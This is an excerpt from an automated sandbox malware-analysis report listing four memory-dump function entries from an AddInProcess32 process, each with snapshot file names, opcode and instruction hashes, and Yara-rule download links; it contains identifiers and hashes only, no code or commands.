                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0603728f8371016c059e8cd1a0e7f69a9009d380eb98a62e6cdecdc435cce42
                • Instruction ID: 6cf2fcfad84d16aaaf0b76ab239805b4b70ee313c61f138876a852260c05c83d
                • Opcode Fuzzy Hash: b0603728f8371016c059e8cd1a0e7f69a9009d380eb98a62e6cdecdc435cce42
                • Instruction Fuzzy Hash: AEB18174E00218CFDB54DFA9D984A9DBBB2FF88310F2181A9D819AB365DB34AD41CF50
                Function 02F6F03B Relevance: .2, Instructions: 193COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a4485c0f1489d7ebdca0e1843aedbc55fd4d59173aafa8b5e9df97b074e3371
                • Instruction ID: 37224e58d7ffa8d286deb551128ec8f7381efd709f70a48501c0131563986514
                • Opcode Fuzzy Hash: 2a4485c0f1489d7ebdca0e1843aedbc55fd4d59173aafa8b5e9df97b074e3371
                • Instruction Fuzzy Hash: 25A19B74A01228CFDB64DF24C954BAABBB2FF4A340F1085EAD50AA7350CB359E81CF51
                Function 06A737FA Relevance: .1, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e88f4e022a05369844bf4c3c31bdcec2d11e5ceddc1f2e2033f475e3115343d
                • Instruction ID: 1f774411506e5600517c18b9962dfc3cd80c4f78be98b8f73c80c50a2460b666
                • Opcode Fuzzy Hash: 5e88f4e022a05369844bf4c3c31bdcec2d11e5ceddc1f2e2033f475e3115343d
                • Instruction Fuzzy Hash: 6551D274E016488FDB48DFAAD984A9DBBF2FF89300F248169D418AB365DB309942CF10
                Function 02F6F21B Relevance: .1, Instructions: 116COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbf5d37d1957f4752981436131b5a85cab9f62900b879b473a94a89086299e6b
                • Instruction ID: d0dcbce7046ee4b4ced1af19fd02c5f52f19f655c20e5da8f978cb170facb61c
                • Opcode Fuzzy Hash: cbf5d37d1957f4752981436131b5a85cab9f62900b879b473a94a89086299e6b
                • Instruction Fuzzy Hash: 0851BE74A01228CFCB64DF24D894BAAB7B2FF4A340F5085E9D40AA7350CB359E81CF50